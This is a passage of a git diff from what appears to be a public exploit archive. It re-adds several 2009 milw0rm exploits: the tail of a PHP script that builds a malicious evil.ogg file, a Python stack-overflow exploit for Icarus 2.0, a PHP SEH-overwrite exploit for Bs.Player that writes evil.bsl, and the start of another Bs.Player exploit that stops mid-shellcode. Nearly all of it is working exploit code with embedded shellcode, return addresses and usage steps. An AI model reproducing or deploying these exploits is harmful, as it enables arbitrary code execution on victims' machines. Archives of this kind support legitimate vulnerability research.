+"\x4a\xa9\x94\x52\x4a\x29\xa5\x94\x52\x52\x4a\x29\xa5\x94\x52\x29". +"\xa5\x94\x52\x4a\x29\xa5\xa4\x94\x52\x4a\x29\xa5\x52\x4a\x29\xa5". +"\x94\x52\x4a\x49\x29\xa5\x94\x52\x4a\xa5\x94\x52\x4a\x29\xa5\x94". +"\x92\x52\x4a\x29\xa5\x94\x52\x2a\xa5\x94\x52\x4a\x29\xa5\x00\x00". +"\xa0\x03\x07\x00\x80\x00\x23\x2a\x2d\xc4\x4e\x33\xae\x3c\x02\x47". +"\x14\x32\x4c\x40\x85\x86\xac\x04\x00\xc8\x00\x00\x10\x07\xb1\xb4". +"\xd6\x5a\xab\x8c\x72\xca\x49\x49\xad\x43\x46\x1a\xe6\xa0\xa4\xd8". +"\x49\x07\x21\xb5\x58\x4b\x65\x20\x41\xca\x49\x4a\x9d\x82\x08\x29". +"\x06\xa9\x85\x8c\x2a\xa5\x98\x93\x96\x42\xcb\x98\x52\x0c\x62\x2b". +"\x31\x74\x8c\x31\x47\x39\xe5\x54\x42\xc7\x18\x00\x00\x00\x82\x00". +"\x00\x03\x11\x32\x13\x08\x14\x40\x81\x81\x0c\x00\x38\x40\x48\x90". +"\x02\x00\x0a\x0b\x0c\x1d\xc3\x45\x40\x40\x2e\x21\xa3\xc0\xa0\x70". 
+"\x4c\x38\x27\x9d\x36\x00\x00\x41\x88"; + +function crcOgg (&$_x) + { + $crc=0; + $polynom=0x04C11DB7; //polynomial generator + for ($i=0; $i<strlen($_x); $i++) + { + $c = ord($_x[$i]); + for ($j=0; $j<8; $j++) + { + $bit=0; + if ($crc&0x80000000) $bit=1; + if ($c&0x80) $bit^=1; + $c<<=1; $crc<<=1; + if ($bit) $crc^=$polynom; + } + } + $_x[22]=chr($crc&0xFF); $_x[23]=chr(($crc>>8)&0xFF); + $_x[24]=chr(($crc>>16)&0xFF); $_x[25]=chr(($crc>>24)&0xFF); + } + +crcOgg($_frgmnt2); + +$_frgmnt3="\x4f\x67\x67\x53\x00\x01\x00". +"\x00\x00\x00\x00\x00\x00\x00\x66\x07\x00\x00\x02\x00\x00\x00\x6a". +"\xa0\x3f\xb6\x01\x91\xcc\x10\x89\x88\xc5\x20\x31\xa1\x1a\x28\x2a". +"\xa6\x03\x80\xc5\x05\x86\x7c\x00\xc8\xd0\xd8\x48\xbb\xb8\x80\x2e". +"\x03\x5c\xd0\xc5\x5d\x07\x42\x08\x42\x10\x82\x58\x1c\x40\x01\x09". +"\x38\x38\xe1\x86\x27\xde\xf0\x84\x1b\x9c\xa0\x53\x54\xea\x40\x00". +"\x00\x00\x00\x00\x1e\x00\xe0\x01\x00\x20\xd9\x00\x22\x22\xa2\x99". +"\xe3\xe8\xf0\xf8\x00\x09\x11\x19\x21\x29\x31\x39\x41\x11\x00\x00". +"\x00\x00\x00\x3b\x00\xf8\x00\x00\x48\x52\x80\x88\x88\x68\xe6\x38". +"\x3a\x3c\x3e\x40\x42\x44\x46\x48\x4a\x4c\x4e\x50\x02\x00\x00\x01". +"\x04\x00\x00\x00\x00\x40\x00\x01\x08\x08\x08\x00\x00\x00\x00\x00". +"\x04\x00\x00\x00\x08\x08\x4f\x67\x67\x53\x00\x04\x61\x18\x00\x00". +"\x00\x00\x00\x00\x66\x07\x00\x00\x03\x00\x00\x00\xa5\xbe\xcf\x36". +"\x09\x2c\x86\x63\x01\x01\x01\xfc\xff\x17\xd4\x1c\xf7\xd1\x45\xd0". +"\xfb\xcf\xce\x6b\x8e\xfb\xe8\x22\xe8\xfd\x67\xe7\x64\x90\x02\x19". +"\xc6\x08\x00\xe2\x46\x62\x05\x6b\x7f\xef\xb3\xd8\xfd\xfb\xef\xac". +"\xb4\x92\xc0\xef\x5f\x05\xda\x65\xfc\xf7\x48\x5f\xa4\x80\x51\x33". +"\x45\x8b\xa2\xa2\xcb\xf8\xef\x91\xbe\x48\x01\xa3\x66\x8a\x16\x45". +"\x05\x88\x64\x66\xa7\x33\x49\x34\x00\x00\x24\x90\x02\x10\x38\x15". +"\x20\x4c\x00\x24\x00\x00\x00\xd0\x0a\xaa\xd1\x50\x55\x4c\xd4\xd2". +"\x26\xab\x6a\x9a\x98\x34\xfe\x34\xba\xbd\x52\x1d\xc0\x80\x78\xc6". +"\xa2\x0c\x9d\xe4\x10\x40\x11\x35\xac\x61\xa3\x29\x50\xa4\x90\x08". 
+"\xd2\x8a\x76\x50\x7f\x1a\x5d\x2b\x55\x48\x00\x94\x52\x4a\x59\x0a". +"\x30\x62\x84\xd2\x96\x07\xc0\x18\xb0\x80\x62\x8d\xb7\xa0\x01\xc1". +"\x5a\x23\x80\x01\x00\x00\x9d\x00\x00\x00\x80\x00\xde\x65\xfc\xef". +"\x28\x5f\x4a\x81\xb1\xc9\x84\xe8\x32\xfe\x77\x94\x2f\xa5\xc0\xd8". +"\x64\x42\x80\x80\x24\x60\x31\x66\x22\x9d\x0a\x00\x20\x20\x01\x06". +"\x00\x00\x00\x80\x2f\x36\xb7\x2a\x7c\x65\xb2\xde\xba\x95\xb7\x4b". +"\x06\x72\xfe\xee\x5c\x00\xbe\x3e\xb3\xb9\x75\xab\x02\xf0\x06\x38". +"\x51\x51\x40\x2c\xad\xd9\x68\x05\xab\x36\x58\xd7\xa8\x02\x62\xb1". +"\x18\x80\xfb\x9c\xf9\x79\x73\xab\x02\x5b\xb7\x7e\xf8\xfc\x19\x0e". +"\x0e\x0e\xbe\x65\xfc\xf7\x48\x6f\x8c\x01\x0e\x90\x35\xdc\x7c\x8f". +"\x77\xdc\xc0\x34\xcc\x1c\x45\x29\x6a\x3e\xe8\x99\x51\xe2\xa8\x20". +"\x54\x90\x10\xe1\x24\x00\x00\x00\x00\x80\xfa\x30\x0c\x45\x44\x44". +"\xa4\x33\xcb\xb2\x52\xa9\x68\xb5\xda\xd5\x4a\x55\x55\x55\x5d\x96". +"\x65\xb1\xfd\xef\xbf\xff\x02\x5c\xc6\x86\x61\xb8\x7b\x79\x09\xac". +"\xa2\xaa\xaa\xaa\x4f\x18\x99\x29\x49\x52\xb4\x2c\xcb\xb2\x2c\xcb". +"\xb2\x2c\xcb\xb2\x2c\xdd\x4d\xd9\xa1\xaa\xae\x56\xab\xb5\x6b\xd7". +"\x6a\x57\xab\xd5\x6a\xb5\x5a\xd6\x75\xb5\x67\x06\x80\xcc\x0c\x0c". +"\xc3\x30\x0c\xc3\x70\xa5\x95\x56\x5a\xa9\x01\xa0\xaa\xec\x38\x8e". +"\xe3\x52\xad\x54\x2a\x95\x4a\xa5\x52\xa9\xa8\xaa\xaa\x2e\x8b\x67". +"\x88\x90\xa2\x28\x14\xbd\x5e\xaf\xd7\xeb\xf5\x8a\xa2\x14\x85\x88". +"\x88\x00\xac\xad\xad\xaa\xaa\xaa\x7f\xff\xfd\xf7\xdf\xaa\xaa\xaa". +"\x4f\x46\x78\xde\xdc\xdc\xdc\xdc\xa4\x14\x3a\x00\x00\x78\xc5\x55". +"\x55\x55\x55\x55\x55\x95\x87\xfa\xc0\x30\x0c\xeb\x00\x46\x7d\x18". +"\x86\x61\x18\x86\x97\xbc\xcf\xcf\xcf\xcf\xcf\x4f\x4f\x7d\x7d\x7d". +"\x7d\x7d\x3d\x80\x5d\x55\xf7\x7d\xdf\xb7\x6d\xff\xab\x00\xbe\x65". +"\xfc\xf7\x90\x6f\xac\x81\x35\x24\xeb\xa5\x6f\xcb\xf8\xdf\x2e\xdf". +"\x60\xe0\x40\x46\xc2\xb8\x34\xbd\x5e\xaf\xd7\xeb\xad\x61\xb3\x3a". +"\x83\xd8\xa5\x03\xe6\x18\x98\x04\x00\x00\x00\x60\xb1\xb5\xb1\xb7". 
+"\x77\xb4\x1a\x55\x3a\x1e\x4d\x4e\x35\xcc\x00\x80\x58\x2c\x56\x54". +"\x45\xbb\x6f\x54\xf6\x48\xb6\x99\x0f\xf9\x90\x0f\xb9\xca\x20\x6b". +"\x0d\xc2\x20\x0c\xc2\x20\x0c\xc2\x20\x0c\xc2\x20\x0c\xc2\x20\x8c". +"\xe2\x28\x8e\x2c\x6f\x6e\x6e\x6e\x1a\xd6\xe6\xe6\xe6\xe6\x66\x59". +"\x96\xa5\xd6\xc5\xb2\x2c\xcb\xb2\x2c\x16\x8b\xaa\xa8\x8a\xaa\xa8". +"\x7a\x6d\x55\xad\xaa\x8a\x5a\x2f\xe2\x1e\x80\x0c\xcb\xb2\xbc\x84". +"\x41\x18\x84\x41\x18\x84\x41\x18\x84\x41\x18\xac\xb2\x2c\x0b\x58". +"\x65\x59\x96\x65\x59\x96\x37\x0e\x32\x52\x5c\x94\x45\xa9\x54\xf4". +"\x15\x8d\x6e\x5d\xba\x75\xe9\xd4\xa1\x53\x87\xce\x35\x6b\x35\x5a". +"\xcd\x4a\x51\x95\x55\x96\x1b\x00\x00\x58\x9b\x00\xc0\x7a\x6b\xce". +"\xf9\xf6\xf6\xf6\xf6\x36\x0c\x2c\x0b\x80\x92\xe5\xcf\x9f\x3f\x7f". +"\xfe\xfc\xf9\xb3\x0b\x00\x23\xcb\x8a\x83\x30\x08\x83\x30\x08\x17". +"\xcb\xb2\x2c\x2b\xba\xf2\x00\x00\xd4\xca\xb2\x94\x65\x59\xd6\xba". +"\xac\xcb\xba\xac\x8b\x65\x59\xd3\x03\x00\xbc\x3f\x7f\xfe\xfc\xf9". +"\xf3\xe7\xcf\x00\x00"; +$fp=fopen("evil.ogg","w+"); +if (!$fp) {die("cannot create evil.ogg...");} +@fputs($fp,$_frgmnt1.$_frgmnt2.$_frgmnt3); +@fclose($fp); +?> + +# milw0rm.com [2009-03-18] diff --git a/platforms/windows/local/8236.py b/platforms/windows/local/8236.py index adbbd563e..6504e3d83 100755 --- a/platforms/windows/local/8236.py +++ b/platforms/windows/local/8236.py 
@@ -1,64 +1,64 @@
-#usage: exploit.py
-print "********************************************************************"
-print " Icarus 2.0 Local Stack Overflow Exploit\n"
-print " Download: http://www.randomsoftware.com/pub/icarus.exe"
-print " Author : His0k4"
-print " Tested on: Windows XP Pro SP2 Fr\n"
-print " Greetings to:"
-print " All friends & muslims HaCkers(dz)\n"
-print " Tip of the day: Klimontayne fe romayne :D"
-print "********************************************************************\n\n"
-
-
-payload1 = "\x41" * 336
-payload1 += "\x5D\x38\x82\x7C" # call esp kernel32.dll (sp2)
-payload1 += "\x90" * 19 #some nops
-payload1 += "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38"
-payload1 += "\x4e\xf9\x9f\x83\xeb\xfc\xe2\xf4\xc4\xa6\xbd\x9f\x38\x4e\x72\xda"
-payload1 += "\x04\xc5\x85\x9a\x40\x4f\x16\x14\x77\x56\x72\xc0\x18\x4f\x12\xd6"
-payload1 += "\xb3\x7a\x72\x9e\xd6\x7f\x39\x06\x94\xca\x39\xeb\x3f\x8f\x33\x92"
-payload1 += "\x39\x8c\x12\x6b\x03\x1a\xdd\x9b\x4d\xab\x72\xc0\x1c\x4f\x12\xf9"
-payload1 += "\xb3\x42\xb2\x14\x67\x52\xf8\x74\xb3\x52\x72\x9e\xd3\xc7\xa5\xbb"
-payload1 += "\x3c\x8d\xc8\x5f\x5c\xc5\xb9\xaf\xbd\x8e\x81\x93\xb3\x0e\xf5\x14"
-payload1 += "\x48\x52\x54\x14\x50\x46\x12\x96\xb3\xce\x49\x9f\x38\x4e\x72\xf7"
-payload1 += "\x04\x11\xc8\x69\x58\x18\x70\x67\xbb\x8e\x82\xcf\x50\xbe\x73\x9b"
-payload1 += "\x67\x26\x61\x61\xb2\x40\xae\x60\xdf\x2d\x98\xf3\x5b\x4e\xf9\x9f"
-junk = "\xCC"*7000
-
-
-payload2 = "\x5B\x46\x6F\x72\x6D\x61\x74\x20\x22\x4C\x65\x63\x74\x75\x72\x65\x22\x5D"
-payload2 += "\x0A\x5B\x54\x69\x74\x6C\x65\x20\x22\x65\x78\x70\x6C\x6F\x69\x74\x22\x5D"
-payload2 += "\x0A\x0A"
-payload2 += "\x41"*788
-payload2 += "\xEB\x06\x90\x90" # jmp +6
-payload2 += "\xE9\x10\x37\x01" # universal pop pop ret
-payload2 += "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38"
-payload2 += "\x4e\xf9\x9f\x83\xeb\xfc\xe2\xf4\xc4\xa6\xbd\x9f\x38\x4e\x72\xda"
-payload2 += "\x04\xc5\x85\x9a\x40\x4f\x16\x14\x77\x56\x72\xc0\x18\x4f\x12\xd6"
-payload2 += "\xb3\x7a\x72\x9e\xd6\x7f\x39\x06\x94\xca\x39\xeb\x3f\x8f\x33\x92"
-payload2 += "\x39\x8c\x12\x6b\x03\x1a\xdd\x9b\x4d\xab\x72\xc0\x1c\x4f\x12\xf9"
-payload2 += "\xb3\x42\xb2\x14\x67\x52\xf8\x74\xb3\x52\x72\x9e\xd3\xc7\xa5\xbb"
-payload2 += "\x3c\x8d\xc8\x5f\x5c\xc5\xb9\xaf\xbd\x8e\x81\x93\xb3\x0e\xf5\x14"
-payload2 += "\x48\x52\x54\x14\x50\x46\x12\x96\xb3\xce\x49\x9f\x38\x4e\x72\xf7"
-payload2 += "\x04\x11\xc8\x69\x58\x18\x70\x67\xbb\x8e\x82\xcf\x50\xbe\x73\x9b"
-payload2 += "\x67\x26\x61\x61\xb2\x40\xae\x60\xdf\x2d\x98\xf3\x5b\x4e\xf9\x9f"
-payload2 += "\xCC"*7000
-
-
-
-try:
- out_file = open("exploit_eip.PGN",'w')
- out_file.write(payload1+junk)
- out_file.close()
- print "Eip exploit File Created!\nNow you can run this file directly\n"
-except:
- print "Error"
-try:
- out_file = open("exploit_seh.PGN",'w')
- out_file.write(payload2)
- out_file.close()
- print "Seh exploit File Created!\nOpen Icarus then game>load and chose exploit_seh.PGN\n"
-except:
- print "Error"
-
-# milw0rm.com [2009-03-18]
+#usage: exploit.py
+print "********************************************************************"
+print " Icarus 2.0 Local Stack Overflow Exploit\n"
+print " Download: http://www.randomsoftware.com/pub/icarus.exe"
+print " Author : His0k4"
+print " Tested on: Windows XP Pro SP2 Fr\n"
+print " Greetings to:"
+print " All friends & muslims HaCkers(dz)\n"
+print " Tip of the day: Klimontayne fe romayne :D"
+print "********************************************************************\n\n"
+
+
+payload1 = "\x41" * 336
+payload1 += "\x5D\x38\x82\x7C" # call esp kernel32.dll (sp2)
+payload1 += "\x90" * 19 #some nops
+payload1 += "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38"
+payload1 += "\x4e\xf9\x9f\x83\xeb\xfc\xe2\xf4\xc4\xa6\xbd\x9f\x38\x4e\x72\xda"
+payload1 += "\x04\xc5\x85\x9a\x40\x4f\x16\x14\x77\x56\x72\xc0\x18\x4f\x12\xd6"
+payload1 += "\xb3\x7a\x72\x9e\xd6\x7f\x39\x06\x94\xca\x39\xeb\x3f\x8f\x33\x92"
+payload1 += "\x39\x8c\x12\x6b\x03\x1a\xdd\x9b\x4d\xab\x72\xc0\x1c\x4f\x12\xf9"
+payload1 += "\xb3\x42\xb2\x14\x67\x52\xf8\x74\xb3\x52\x72\x9e\xd3\xc7\xa5\xbb"
+payload1 += "\x3c\x8d\xc8\x5f\x5c\xc5\xb9\xaf\xbd\x8e\x81\x93\xb3\x0e\xf5\x14"
+payload1 += "\x48\x52\x54\x14\x50\x46\x12\x96\xb3\xce\x49\x9f\x38\x4e\x72\xf7"
+payload1 += "\x04\x11\xc8\x69\x58\x18\x70\x67\xbb\x8e\x82\xcf\x50\xbe\x73\x9b"
+payload1 += "\x67\x26\x61\x61\xb2\x40\xae\x60\xdf\x2d\x98\xf3\x5b\x4e\xf9\x9f"
+junk = "\xCC"*7000
+
+
+payload2 = "\x5B\x46\x6F\x72\x6D\x61\x74\x20\x22\x4C\x65\x63\x74\x75\x72\x65\x22\x5D"
+payload2 += "\x0A\x5B\x54\x69\x74\x6C\x65\x20\x22\x65\x78\x70\x6C\x6F\x69\x74\x22\x5D"
+payload2 += "\x0A\x0A"
+payload2 += "\x41"*788
+payload2 += "\xEB\x06\x90\x90" # jmp +6
+payload2 += "\xE9\x10\x37\x01" # universal pop pop ret
+payload2 += "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38"
+payload2 += "\x4e\xf9\x9f\x83\xeb\xfc\xe2\xf4\xc4\xa6\xbd\x9f\x38\x4e\x72\xda"
+payload2 += "\x04\xc5\x85\x9a\x40\x4f\x16\x14\x77\x56\x72\xc0\x18\x4f\x12\xd6"
+payload2 += "\xb3\x7a\x72\x9e\xd6\x7f\x39\x06\x94\xca\x39\xeb\x3f\x8f\x33\x92"
+payload2 += "\x39\x8c\x12\x6b\x03\x1a\xdd\x9b\x4d\xab\x72\xc0\x1c\x4f\x12\xf9"
+payload2 += "\xb3\x42\xb2\x14\x67\x52\xf8\x74\xb3\x52\x72\x9e\xd3\xc7\xa5\xbb"
+payload2 += "\x3c\x8d\xc8\x5f\x5c\xc5\xb9\xaf\xbd\x8e\x81\x93\xb3\x0e\xf5\x14"
+payload2 += "\x48\x52\x54\x14\x50\x46\x12\x96\xb3\xce\x49\x9f\x38\x4e\x72\xf7"
+payload2 += "\x04\x11\xc8\x69\x58\x18\x70\x67\xbb\x8e\x82\xcf\x50\xbe\x73\x9b"
+payload2 += "\x67\x26\x61\x61\xb2\x40\xae\x60\xdf\x2d\x98\xf3\x5b\x4e\xf9\x9f"
+payload2 += "\xCC"*7000
+
+
+
+try:
+ out_file = open("exploit_eip.PGN",'w')
+ out_file.write(payload1+junk)
+ out_file.close()
+ print "Eip exploit File Created!\nNow you can run this file directly\n"
+except:
+ print "Error"
+try:
+ out_file = open("exploit_seh.PGN",'w')
+ out_file.write(payload2)
+ out_file.close()
+ print "Seh exploit File Created!\nOpen Icarus then game>load and chose exploit_seh.PGN\n"
+except:
+ print "Error"
+
+# milw0rm.com [2009-03-18]
diff --git a/platforms/windows/local/8249.php b/platforms/windows/local/8249.php
index fc8e868ba..1496dc400 100755
--- a/platforms/windows/local/8249.php
+++ b/platforms/windows/local/8249.php
@@ -1,80 +1,80 @@ -<?php -/* -Bs.Player <= 2.34 Build 980 (.bsl) local buffer overflow 0day exploit (seh) -by Nine:Situations:Group::pyrokinesis - -Overlong hostnames in bsplayer playlist files causes eax and seh handlers to be -overwritten. Cannot reliably debug with olly because of code compression, just -used faultmon/memdump/msfpescan and I choosed the easy/universal way with seh. -There are some pop ret addresses in common among the vulnerable versions... - -Well it says local but I consider it a remote one because .bsl files are -associated to the program -Tested and working against: - -... -v2.32 Build 975 Free -v2.34 Build 980 PRO -win xp pro sp2 / sp3 -win 2k3 sp1 - -not vulnerable: -v2.35 Build 985 PRO -V2.36 Build 990 Free/Pro - - -*/ -$buffer= -"\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46". -"\x3a\x30\x2c\x41\x41\x41\x41\x0d\x0a\x68\x74\x74\x70\x3a\x2f\x2f". -"\x52\x61\x77\x2d\x48\x69\x67\x68\x2e"; - -$nop1=str_repeat("\x90",384); -$eax_again="BBBB"; -$nop2=str_repeat("\x90",12); -$eax="CCCC"; -$nop3=str_repeat("\x90",8); -$jnk=$nop1.$eax_again.$nop2.$eax.$nop3; - -$jmp="\xeb\x08\x90\x90"; - -$seh="\xb1\xad\x41\x00"; //0x0041adb1 pop pop ret bsplayer.exe - -$nop4=str_repeat("\x90",100); - -// win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com -$scode= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". -"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x47". -"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x57\x32\x42\x42\x42\x32". -"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x59\x79\x4b\x4c\x69". -"\x78\x37\x34\x67\x70\x45\x50\x75\x50\x6c\x4b\x61\x55\x45\x6c\x6e". -"\x6b\x71\x6c\x73\x35\x62\x58\x66\x61\x6a\x4f\x4c\x4b\x42\x6f\x56". -"\x78\x4c\x4b\x71\x4f\x77\x50\x57\x71\x6a\x4b\x72\x69\x6e\x6b\x75". -"\x64\x4e\x6b\x75\x51\x68\x6e\x30\x31\x59\x50\x4d\x49\x4c\x6c\x4f". -"\x74\x69\x50\x31\x64\x36\x67\x4f\x31\x4a\x6a\x44\x4d\x75\x51\x68". 
-"\x42\x38\x6b\x5a\x54\x35\x6b\x62\x74\x75\x74\x37\x74\x70\x75\x68". -"\x65\x4c\x4b\x51\x4f\x35\x74\x73\x31\x4a\x4b\x50\x66\x6c\x4b\x44". -"\x4c\x50\x4b\x6c\x4b\x41\x4f\x77\x6c\x34\x41\x7a\x4b\x6c\x4b\x67". -"\x6c\x6e\x6b\x37\x71\x6a\x4b\x4d\x59\x33\x6c\x71\x34\x54\x44\x39". -"\x53\x55\x61\x6f\x30\x41\x74\x6c\x4b\x37\x30\x70\x30\x6e\x65\x4b". -"\x70\x61\x68\x66\x6c\x6e\x6b\x61\x50\x36\x6c\x6e\x6b\x74\x30\x65". -"\x4c\x6e\x4d\x6c\x4b\x71\x78\x64\x48\x68\x6b\x76\x69\x6c\x4b\x4f". -"\x70\x48\x30\x75\x50\x75\x50\x55\x50\x4e\x6b\x63\x58\x67\x4c\x31". -"\x4f\x56\x51\x4a\x56\x53\x50\x41\x46\x4f\x79\x4b\x48\x4b\x33\x39". -"\x50\x61\x6b\x32\x70\x53\x58\x6c\x30\x4c\x4a\x65\x54\x53\x6f\x63". -"\x58\x7a\x38\x49\x6e\x4e\x6a\x54\x4e\x70\x57\x69\x6f\x58\x67\x62". -"\x43\x72\x41\x70\x6c\x70\x63\x43\x30\x47"; - -$buffer.=$jnk.$jmp.$seh.$nop4.$scode; -$buffer.= -"x56\x37\x2e\x46\x4d\x2f\x6c\x69\x73\x74\x65\x6e\x2e\x70". -"\x6c\x73\x0d\x0a\x00"; - -$fp=fopen("evil.bsl","w+"); -if (!$fp) {die("cannot create evil.bsl!");} -@fputs($fp,$buffer); -@fclose($fp); -?> - -# milw0rm.com [2009-03-20] +<?php +/* +Bs.Player <= 2.34 Build 980 (.bsl) local buffer overflow 0day exploit (seh) +by Nine:Situations:Group::pyrokinesis + +Overlong hostnames in bsplayer playlist files causes eax and seh handlers to be +overwritten. Cannot reliably debug with olly because of code compression, just +used faultmon/memdump/msfpescan and I choosed the easy/universal way with seh. +There are some pop ret addresses in common among the vulnerable versions... + +Well it says local but I consider it a remote one because .bsl files are +associated to the program +Tested and working against: + +... +v2.32 Build 975 Free +v2.34 Build 980 PRO +win xp pro sp2 / sp3 +win 2k3 sp1 + +not vulnerable: +v2.35 Build 985 PRO +V2.36 Build 990 Free/Pro + + +*/ +$buffer= +"\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46". +"\x3a\x30\x2c\x41\x41\x41\x41\x0d\x0a\x68\x74\x74\x70\x3a\x2f\x2f". 
+"\x52\x61\x77\x2d\x48\x69\x67\x68\x2e"; + +$nop1=str_repeat("\x90",384); +$eax_again="BBBB"; +$nop2=str_repeat("\x90",12); +$eax="CCCC"; +$nop3=str_repeat("\x90",8); +$jnk=$nop1.$eax_again.$nop2.$eax.$nop3; + +$jmp="\xeb\x08\x90\x90"; + +$seh="\xb1\xad\x41\x00"; //0x0041adb1 pop pop ret bsplayer.exe + +$nop4=str_repeat("\x90",100); + +// win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com +$scode= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". +"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x47". +"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x57\x32\x42\x42\x42\x32". +"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x59\x79\x4b\x4c\x69". +"\x78\x37\x34\x67\x70\x45\x50\x75\x50\x6c\x4b\x61\x55\x45\x6c\x6e". +"\x6b\x71\x6c\x73\x35\x62\x58\x66\x61\x6a\x4f\x4c\x4b\x42\x6f\x56". +"\x78\x4c\x4b\x71\x4f\x77\x50\x57\x71\x6a\x4b\x72\x69\x6e\x6b\x75". +"\x64\x4e\x6b\x75\x51\x68\x6e\x30\x31\x59\x50\x4d\x49\x4c\x6c\x4f". +"\x74\x69\x50\x31\x64\x36\x67\x4f\x31\x4a\x6a\x44\x4d\x75\x51\x68". +"\x42\x38\x6b\x5a\x54\x35\x6b\x62\x74\x75\x74\x37\x74\x70\x75\x68". +"\x65\x4c\x4b\x51\x4f\x35\x74\x73\x31\x4a\x4b\x50\x66\x6c\x4b\x44". +"\x4c\x50\x4b\x6c\x4b\x41\x4f\x77\x6c\x34\x41\x7a\x4b\x6c\x4b\x67". +"\x6c\x6e\x6b\x37\x71\x6a\x4b\x4d\x59\x33\x6c\x71\x34\x54\x44\x39". +"\x53\x55\x61\x6f\x30\x41\x74\x6c\x4b\x37\x30\x70\x30\x6e\x65\x4b". +"\x70\x61\x68\x66\x6c\x6e\x6b\x61\x50\x36\x6c\x6e\x6b\x74\x30\x65". +"\x4c\x6e\x4d\x6c\x4b\x71\x78\x64\x48\x68\x6b\x76\x69\x6c\x4b\x4f". +"\x70\x48\x30\x75\x50\x75\x50\x55\x50\x4e\x6b\x63\x58\x67\x4c\x31". +"\x4f\x56\x51\x4a\x56\x53\x50\x41\x46\x4f\x79\x4b\x48\x4b\x33\x39". +"\x50\x61\x6b\x32\x70\x53\x58\x6c\x30\x4c\x4a\x65\x54\x53\x6f\x63". +"\x58\x7a\x38\x49\x6e\x4e\x6a\x54\x4e\x70\x57\x69\x6f\x58\x67\x62". +"\x43\x72\x41\x70\x6c\x70\x63\x43\x30\x47"; + +$buffer.=$jnk.$jmp.$seh.$nop4.$scode; +$buffer.= +"x56\x37\x2e\x46\x4d\x2f\x6c\x69\x73\x74\x65\x6e\x2e\x70". 
+"\x6c\x73\x0d\x0a\x00";
+
+$fp=fopen("evil.bsl","w+");
+if (!$fp) {die("cannot create evil.bsl!");}
+@fputs($fp,$buffer);
+@fclose($fp);
+?>
+
+# milw0rm.com [2009-03-20]
diff --git a/platforms/windows/local/8251.py b/platforms/windows/local/8251.py
index 14b8690c5..b62d680e3 100755
--- a/platforms/windows/local/8251.py
+++ b/platforms/windows/local/8251.py
@@ -1,59 +1,59 @@ -#usage: exploit.py -print "**************************************************************************" -print " Bs.Player 2.34 (.bsl) Universal Seh Overwrite Exploit\n" -print " Author : Nine:Situations:Group::pyrokinesis" -print " Exploited by : His0k4" -print " Tested on: Windows XP Pro SP2 Fr\n" -print " Greetings to:" -print " All friends & muslims HaCkers(dz)\n" -print "**************************************************************************" - - -buff = "\x41" * 412 - -next_seh = "\xEB\x12\x41\x41" - -seh = "\xD0\x26\x58\x02" # oldskin.dll - -nops = "\x90"*19 - -header1= "\x68\x74\x74\x70\x3A\x2F\x2F\x52\x61\x77\x2D\x48\x69\x67\x68\x2E" -header2= "\x2E\x46\x4D\x2F\x6C\x69\x73\x74\x65\x6E\x2E\x70\x6C\x73\x0A\x00" - -# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -shellcode = ( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" -"\x42\x50\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x33\x4b\x58\x4e\x37" -"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x51\x4b\x58" -"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48" -"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" -"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x55\x46\x52\x46\x50\x45\x37\x45\x4e\x4b\x58" -"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x34" -"\x4b\x58\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58" -"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53" -"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x57" -"\x4e\x50\x4b\x58\x42\x54\x4e\x30\x4b\x38\x42\x57\x4e\x41\x4d\x4a" 
